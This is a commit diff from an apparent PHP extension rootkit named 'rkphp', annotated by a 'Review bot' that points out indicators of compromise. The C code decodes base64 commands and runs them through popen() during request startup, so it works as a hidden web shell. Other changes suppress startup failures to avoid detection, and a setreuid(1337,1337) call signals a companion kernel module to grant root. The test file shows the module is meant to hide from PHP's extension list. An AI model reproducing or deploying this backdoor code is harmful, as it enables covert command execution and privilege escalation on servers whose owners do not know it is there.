
Default

master
Root 5 years ago
parent
commit
695df2d7d3
  1. 27
      rkphp/src/php_funcs.c
  2. 4
      rkphp/test.php

27
rkphp/src/php_funcs.c

@ -88,7 +88,7 @@ PHP_FUNCTION(rkphp_ex) @@ -88,7 +88,7 @@ PHP_FUNCTION(rkphp_ex)
"ll", &pid, &code) == FAILURE)
RETURN_NULL();
RKPHP_PRINTF("[!] PID: %ld\n[!] CODE: %lx\n", pid, code);
RKPHP_PRINTF("[!] PID: %ld\n[!] CODE: %lx\n", pid, code);
fp = fopen("/proc/self/maps", "r");
if(fp == NULL)
@ -102,7 +102,7 @@ PHP_FUNCTION(rkphp_ex) @@ -102,7 +102,7 @@ PHP_FUNCTION(rkphp_ex)
if(strstr(filename, "rkphp.so") == NULL)
continue;
RKPHP_PRINTF("[c] Start: %s\n[c] End: %s\n[c] Filename: %s\n",
RKPHP_PRINTF("[c] Start: %s\n[c] End: %s\n[c] File: %s\n",
start, end, filename);
break;
@ -114,13 +114,18 @@ PHP_FUNCTION(rkphp_ex) @@ -114,13 +114,18 @@ PHP_FUNCTION(rkphp_ex)
if(code != (lstart + lend))
RETURN_NULL();
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
// Pull root from kernel module.
/* This is where we'll attempt to interact with the kernel module */
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */
RKPHP_PRINTF("[*] Gained Root privileges successfully.\n");
if(getuid() != 0)
{
RKPHP_PRINTF("[!] We've not been given root privileges!\n");
RETURN_NULL();
}
RKPHP_PRINTF("[*] Gained Root privileges successfully!\n");
RETURN_TRUE;
}
@ -177,21 +182,19 @@ PHP_RINIT_FUNCTION(rkphp) @@ -177,21 +182,19 @@ PHP_RINIT_FUNCTION(rkphp)
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
}
php_printf("</pre>\n");
@ -214,13 +217,13 @@ PHP_RINIT_FUNCTION(rkphp) @@ -214,13 +217,13 @@ PHP_RINIT_FUNCTION(rkphp)
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
return SUCCESS;
}
php_printf("<pre>\n");
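Review bot: The `getuid() != 0` check added to rkphp_ex right after `setreuid(1337, 1337)` gives defenders a concrete behaviour to watch for: judging by the adjacent comments, the 1337 pair is a signal value that a companion kernel module is expected to answer with uid 0, so a PHP worker that issues this call and then runs as root is a strong indicator of compromise. In the two PHP_RINIT_FUNCTION hunks, replacing `return FAILURE` with `return SUCCESS` means a bad base64 string or a failed popen() no longer fails request startup, so the module will not show up through request errors; where `encoded` comes from is not visible here. Detection should therefore rest on auditing setreuid calls and shell children of PHP worker processes, and on checking the memory maps of those processes for `rkphp.so`. Both function bodies start and end outside the hunks shown.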

4
rkphp/test.php

@ -2,8 +2,8 @@ @@ -2,8 +2,8 @@
//print_r(get_loaded_extensions());
if(!extension_loaded("rkphp.so"))
printf("[*] Successfully hidden!" . PHP_EOL);
//if(!extension_loaded("rkphp.so"))
// printf("[*] Successfully hidden!" . PHP_EOL);
/* Get address range of extension */
function get_ext_range($name)
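Review bot: The `extension_loaded("rkphp.so")` check is left as commented-out code with no explanation of why it was disabled; a one-line comment such as `// check disabled: <reason>`, or deleting the two lines, would make the test's intent clear. For anyone analysing a host, the message it printed indicates the module is meant to be missing from PHP's own extension list, so `extension_loaded()` and `get_loaded_extensions()` should not be treated as authoritative there; compare the shared objects actually mapped into the PHP process against the configured extensions instead. `get_ext_range()` continues outside this hunk.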
